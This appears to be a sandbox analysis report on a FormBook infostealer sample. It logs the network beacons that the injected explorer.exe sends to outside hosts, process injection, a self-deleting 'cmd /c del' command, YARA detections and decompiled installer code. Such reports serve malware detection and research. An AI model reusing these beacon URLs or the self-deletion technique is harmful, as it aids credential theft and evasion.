Nov 25, 2021 17:49:40.756764889 CET | 6722 | OUT | GET /e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz HTTP/1.1
Host: www.yesrecompensas.lat
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 25, 2021 17:49:40.862773895 CET | 6722 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 16:49:40 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 89
                                              Connection: close
                                              X-date: 2021-11-23T23:37:01+00:00
                                              Expires: Tue, 30 Nov 2021 23:37:01 +0000
                                              Cache-Control: public, max-age=604800
                                              Location: http://yesrecompensas.com.mx
                                              X-Xss-Protection: 1; mode=block
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              X-Cached: HIT
                                              Data Ascii: <html><body onload="document.location.href='http://yesrecompensas.com.mx'"></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49783 | 172.67.158.42 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 17:49:45.949994087 CET | 7577 | OUT | GET /e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz HTTP/1.1
Host: www.gadget198.xyz
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 25, 2021 17:49:45.980499029 CET | 7578 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Thu, 25 Nov 2021 16:49:45 GMT
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Cache-Control: max-age=3600
                                              Expires: Thu, 25 Nov 2021 17:49:45 GMT
                                              Location: https://www.gadget198.xyz/e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=693LmV%2Bw32mJLpz0CjLHpA9CmAqDZ3cBnMrgJPBsLZg3VlXc5o0F7BW0NUSneKFXoV86CV%2FB1SSCUpaP71S1BwtoQ1W6xgQpIeSLasN96ZbuxmIXWd023SoZO7OzNb6p00iwFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 6b3c5f464ee52488-FRA
                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                              Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49784 | 213.186.33.5 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 17:49:51.119391918 CET | 7579 | OUT | GET /e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz HTTP/1.1
Host: www.le-hameau-enchanteur.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 25, 2021 17:49:51.146656990 CET | 7580 | IN | HTTP/1.1 302 Moved Temporarily
                                              server: nginx
                                              date: Thu, 25 Nov 2021 16:49:51 GMT
                                              content-type: text/html
                                              content-length: 138
                                              location: http://www.le-hameau-enchanteur.com
                                              x-iplb-request-id: 5411343F:C278_D5BA2105:0050_619FBEAF_1984DF61:1C785
                                              x-iplb-instance: 16980
                                              set-cookie: SERVERID77446=200173|YZ++s|YZ++s; path=/; HttpOnly
                                              connection: close
                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49785 | 151.139.128.11 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 17:49:56.399925947 CET | 7581 | OUT | GET /e8ia/?iXg8nxg=Y16Z63O1gty4jexpGTflGuIz4Gugt4GYAlGZJQf+kV2UdFWHFdKuPaLe5BRm7+ulCaVU&xTh4=5jvdevo8uz HTTP/1.1
Host: www.henleygirlscricket.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 25, 2021 17:49:56.444983959 CET | 7582 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 25 Nov 2021 16:49:56 GMT
                                              Cache-Control: no-store, no-cache, max-age=0, must-revalidate, private, max-stale=0, post-check=0, pre-check=0
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              Set-Cookie: SPSI=f9ebd8c7b9ab11e4eabd2cfd107b74f6; path=/; HttpOnly; SameSite=Lax;
                                              Set-Cookie: SPSE=jB5wJrLCb5L3BCZV1tOG+b6YamHO2pIF5C6Yl5YG8SpYlBnGa8pQ668eabPu/dm7tdPEIiCzYkZ5CkO7l5whMA==; path=/; HttpOnly; SameSite=Lax;
                                              Set-Cookie: spcsrf=b9a5b2e19df40b785f85ce4477824e3c; path=/; SameSite=Strict; HttpOnly; expires=Thu, 25-Nov-21 18:49:56 GMT
                                              Set-Cookie: adOtr=obsvl; path=/; SameSite=Lax; expires=Thu, 2 Aug 2001 20:47:11 UTC
                                              Set-Cookie: UTGv2=D-h4a7d56b29c1428a99096986a481fb2c3e64; path=/; SameSite=Lax; expires=Tue, 24-May-22 16:49:56 GMT
                                              Server: fbs
                                              X-Accel-Expires: 0
                                              X-HW: 1637858996.cds084.am5.h2,1637858996.cds007.am5.sc,1637858996.cdn2-wafbe02-ams1.stackpath.systems.-.w,1637858996.cds007.am5.p
                                              Access-Control-Allow-Origin: *
                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49798 | 198.54.125.56 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 17:50:01.748836994 CET | 7906 | OUT | GET /e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz HTTP/1.1
Host: www.webartsolution.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 25, 2021 17:50:01.915517092 CET | 7909 | IN | HTTP/1.1 301 Moved Permanently
                                              keep-alive: timeout=5, max=100
                                              content-type: text/html
                                              content-length: 707
                                              date: Thu, 25 Nov 2021 16:50:01 GMT
                                              server: LiteSpeed
                                              location: https://www.webartsolution.net/e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz
                                              x-turbo-charged-by: LiteSpeed
                                              connection: close
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49820 | 37.123.118.150 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 17:50:07.020860910 CET | 8384 | OUT | GET /e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz HTTP/1.1
Host: www.blttsperma.quest
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 25, 2021 17:50:07.050486088 CET | 8385 | IN | HTTP/1.1 403 Forbidden
                                              Server: nginx/1.10.3 (Ubuntu)
                                              Date: Thu, 25 Nov 2021 16:50:07 GMT
                                              Content-Type: text/html
                                              Content-Length: 178
                                              Connection: close
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.4 | 49824 | 143.95.80.65 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 17:50:17.640515089 CET | 8395 | OUT | GET /e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz HTTP/1.1
Host: www.intelldat.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 25, 2021 17:50:17.792484999 CET | 8396 | IN | HTTP/1.1 500 Internal Server Error
                                              Date: Thu, 25 Nov 2021 16:50:17 GMT
                                              Server: Apache
                                              Content-Length: 7309
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>509 Bandwidth Limit Exceeded</TITLE></HEAD><BODY><H1>Bandwidth Limit Exceeded</H1>


                                              Code Manipulations

                                              System Behavior

                                              General

                                              Start time:17:48:22
                                              Start date:25/11/2021
                                              Path:C:\Users\user\Desktop\TT COPY_02101011.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\TT COPY_02101011.exe"
                                              Imagebase:0x400000
                                              File size:309491 bytes
                                              MD5 hash:EBABC0D66A9E01CC0926F3B311FEFF5F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:17:48:24
                                              Start date:25/11/2021
                                              Path:C:\Users\user\Desktop\TT COPY_02101011.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\TT COPY_02101011.exe"
                                              Imagebase:0x400000
                                              File size:309491 bytes
                                              MD5 hash:EBABC0D66A9E01CC0926F3B311FEFF5F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:17:48:28
                                              Start date:25/11/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0x7ff6fee60000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              General

                                              Start time:17:48:52
                                              Start date:25/11/2021
                                              Path:C:\Windows\SysWOW64\autoconv.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\SysWOW64\autoconv.exe
                                              Imagebase:0xef0000
                                              File size:851968 bytes
                                              MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:17:48:53
                                              Start date:25/11/2021
                                              Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                              Imagebase:0xea0000
                                              File size:32768 bytes
                                              MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:17:48:57
                                              Start date:25/11/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
                                              Imagebase:0x11d0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:17:48:59
                                              Start date:25/11/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                                Executed Functions

                                                C-Code - Quality: 83%
                                                			_entry_() {
                                                				struct _SHFILEINFOA _v360;
                                                				struct _SECURITY_ATTRIBUTES* _v376;
                                                				char _v380;
                                                				CHAR* _v384;
                                                				char _v396;
                                                				int _v400;
                                                				int _v404;
                                                				CHAR* _v408;
                                                				intOrPtr _v412;
                                                				int _v416;
                                                				intOrPtr _v420;
                                                				struct _SECURITY_ATTRIBUTES* _v424;
                                                				void* _v432;
                                                				int _t34;
                                                				CHAR* _t39;
                                                				char* _t42;
                                                				signed int _t44;
                                                				void* _t48;
                                                				intOrPtr _t50;
                                                				signed int _t52;
                                                				signed int _t55;
                                                				int _t56;
                                                				signed int _t60;
                                                				intOrPtr _t71;
                                                				intOrPtr _t77;
                                                				void* _t79;
                                                				void* _t89;
                                                				void* _t91;
                                                				char* _t96;
                                                				signed int _t97;
                                                				void* _t98;
                                                				signed int _t99;
                                                				signed int _t100;
                                                				signed int _t103;
                                                				CHAR* _t105;
                                                				signed int _t106;
                                                				intOrPtr _t113;
                                                				char _t120;
                                                
                                                				_v376 = 0;
                                                				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                                                				_t99 = 0;
                                                				_v380 = 0x20;
                                                				__imp__#17();
                                                				_t34 = SetErrorMode(0x8001); // executed
                                                				__imp__OleInitialize(0); // executed
                                                				 *0x42ec18 = _t34;
                                                				 *0x42eb64 = E00405C49(8);
                                                				SHGetFileInfoA(0x428f90, 0,  &_v360, 0x160, 0); // executed
                                                				E0040592B("pewdd Setup", "NSIS Error");
                                                				_t39 = GetCommandLineA();
                                                				_t96 = "\"C:\\Users\\jones\\Desktop\\TT COPY_02101011.exe\" ";
                                                				E0040592B(_t96, _t39);
                                                				 *0x42eb60 = GetModuleHandleA(0);
                                                				_t42 = _t96;
                                                				if("\"C:\\Users\\jones\\Desktop\\TT COPY_02101011.exe\" " == 0x22) {
                                                					_v404 = 0x22;
                                                					_t42 =  &M00434001;
                                                				}
                                                				_t44 = CharNextA(E00405449(_t42, _v404));
                                                				_v404 = _t44;
                                                				while(1) {
                                                					_t91 =  *_t44;
                                                					_t109 = _t91;
                                                					if(_t91 == 0) {
                                                						break;
                                                					}
                                                					__eflags = _t91 - 0x20;
                                                					if(_t91 != 0x20) {
                                                						L5:
                                                						__eflags =  *_t44 - 0x22;
                                                						_v404 = 0x20;
                                                						if( *_t44 == 0x22) {
                                                							_t44 = _t44 + 1;
                                                							__eflags = _t44;
                                                							_v404 = 0x22;
                                                						}
                                                						__eflags =  *_t44 - 0x2f;
                                                						if( *_t44 != 0x2f) {
                                                							L15:
                                                							_t44 = E00405449(_t44, _v404);
                                                							__eflags =  *_t44 - 0x22;
                                                							if(__eflags == 0) {
                                                								_t44 = _t44 + 1;
                                                								__eflags = _t44;
                                                							}
                                                							continue;
                                                						} else {
                                                							_t44 = _t44 + 1;
                                                							__eflags =  *_t44 - 0x53;
                                                							if( *_t44 == 0x53) {
                                                								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                                                								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                                                									_t99 = _t99 | 0x00000002;
                                                									__eflags = _t99;
                                                								}
                                                							}
                                                							__eflags =  *_t44 - 0x4352434e;
                                                							if( *_t44 == 0x4352434e) {
                                                								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                                                								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                                                									_t99 = _t99 | 0x00000004;
                                                									__eflags = _t99;
                                                								}
                                                							}
                                                							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                                                							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                                                								 *((intOrPtr*)(_t44 - 2)) = 0;
                                                								_t45 = _t44 + 2;
                                                								__eflags = _t44 + 2;
                                                								E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t45);
                                                								L20:
                                                								_t105 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                								GetTempPathA(0x400, _t105);
                                                								_t48 = E004030AF(_t109);
                                                								_t110 = _t48;
                                                								if(_t48 != 0) {
                                                									L22:
                                                									DeleteFileA("1033"); // executed
                                                									_t50 = E00402C0B(_t111, _t99); // executed
                                                									_v412 = _t50;
                                                									if(_t50 != 0) {
                                                										L32:
                                                										E00403464();
                                                										__imp__OleUninitialize();
                                                										if(_v408 == 0) {
                                                											__eflags =  *0x42ebf4; // 0x0
                                                											if(__eflags != 0) {
                                                												_t106 = E00405C49(3);
                                                												_t100 = E00405C49(4);
                                                												_t55 = E00405C49(5);
                                                												__eflags = _t106;
                                                												_t97 = _t55;
                                                												if(_t106 != 0) {
                                                													__eflags = _t100;
                                                													if(_t100 != 0) {
                                                														__eflags = _t97;
                                                														if(_t97 != 0) {
                                                															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
                                                															__eflags = _t60;
                                                															if(_t60 != 0) {
                                                																 *_t100(0, "SeShutdownPrivilege",  &_v400);
                                                																_v416 = 1;
                                                																_v404 = 2;
                                                																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
                                                															}
                                                														}
                                                													}
                                                												}
                                                												_t56 = ExitWindowsEx(2, 0);
                                                												__eflags = _t56;
                                                												if(_t56 == 0) {
                                                													E0040140B(9);
                                                												}
                                                											}
                                                											_t52 =  *0x42ec0c; // 0xffffffff
                                                											__eflags = _t52 - 0xffffffff;
                                                											if(_t52 != 0xffffffff) {
                                                												_v400 = _t52;
                                                											}
                                                											ExitProcess(_v400);
                                                										}
                                                										E004051EC(_v408, 0x200010);
                                                										ExitProcess(2);
                                                									}
                                                									_t113 =  *0x42eb7c; // 0x0
                                                									if(_t113 == 0) {
                                                										L31:
                                                										 *0x42ec0c =  *0x42ec0c | 0xffffffff;
                                                										_v400 = E00403489();
                                                										goto L32;
                                                									}
                                                									_t103 = E00405449(_t96, 0);
                                                									while(_t103 >= _t96) {
                                                										__eflags =  *_t103 - 0x3d3f5f20;
                                                										if(__eflags == 0) {
                                                											break;
                                                										}
                                                										_t103 = _t103 - 1;
                                                										__eflags = _t103;
                                                									}
                                                									_t115 = _t103 - _t96;
                                                									_v408 = "Error launching installer";
                                                									if(_t103 < _t96) {
                                                										lstrcatA(_t105, "~nsu.tmp");
                                                										_t101 = "C:\\Users\\jones\\Desktop";
                                                										if(lstrcmpiA(_t105, "C:\\Users\\jones\\Desktop") == 0) {
                                                											goto L32;
                                                										}
                                                										CreateDirectoryA(_t105, 0);
                                                										SetCurrentDirectoryA(_t105);
                                                										_t120 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
                                                										if(_t120 == 0) {
                                                											E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t101);
                                                										}
                                                										E0040592B(0x42f000, _v396);
                                                										 *0x42f400 = 0x41;
                                                										_t98 = 0x1a;
                                                										do {
                                                											_t71 =  *0x42eb70; // 0x571350
                                                											E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t71 + 0x120)));
                                                											DeleteFileA(0x428b90);
                                                											if(_v416 != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\TT COPY_02101011.exe", 0x428b90, 1) != 0) {
                                                												_push(0);
                                                												_push(0x428b90);
                                                												E00405679();
                                                												_t77 =  *0x42eb70; // 0x571350
                                                												E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t77 + 0x124)));
                                                												_t79 = E0040518B(0x428b90);
                                                												if(_t79 != 0) {
                                                													CloseHandle(_t79);
                                                													_v416 = 0;
                                                												}
                                                											}
                                                											 *0x42f400 =  *0x42f400 + 1;
                                                											_t98 = _t98 - 1;
                                                										} while (_t98 != 0);
                                                										_push(0);
                                                										_push(_t105);
                                                										E00405679();
                                                										goto L32;
                                                									}
                                                									 *_t103 = 0;
                                                									_t104 = _t103 + 4;
                                                									if(E004054FF(_t115, _t103 + 4) == 0) {
                                                										goto L32;
                                                									}
                                                									E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                                                									E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                                                									_v424 = 0;
                                                									goto L31;
                                                								}
                                                								GetWindowsDirectoryA(_t105, 0x3fb);
                                                								lstrcatA(_t105, "\\Temp");
                                                								_t89 = E004030AF(_t110);
                                                								_t111 = _t89;
                                                								if(_t89 == 0) {
                                                									goto L32;
                                                								}
                                                								goto L22;
                                                							}
                                                							goto L15;
                                                						}
                                                					} else {
                                                						goto L4;
                                                					}
                                                					do {
                                                						L4:
                                                						_t44 = _t44 + 1;
                                                						__eflags =  *_t44 - 0x20;
                                                					} while ( *_t44 == 0x20);
                                                					goto L5;
                                                				}
                                                				goto L20;
                                                			}

                                                APIs
                                                • #17.COMCTL32 ref: 00403102
                                                • SetErrorMode.KERNELBASE(00008001), ref: 0040310D
                                                • OleInitialize.OLE32(00000000), ref: 00403114
                                                  • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                  • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                                  • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                • SHGetFileInfoA.SHELL32(00428F90,00000000,?,00000160,00000000,00000008), ref: 0040313C
                                                  • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,pewdd Setup,NSIS Error), ref: 00405938
                                                • GetCommandLineA.KERNEL32(pewdd Setup,NSIS Error), ref: 00403151
                                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,00000000), ref: 00403164
                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,00000020), ref: 0040318F
                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403222
                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403237
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403243
                                                • DeleteFileA.KERNELBASE(1033), ref: 00403256
                                                • OleUninitialize.OLE32(00000000), ref: 004032D4
                                                • ExitProcess.KERNEL32 ref: 004032F4
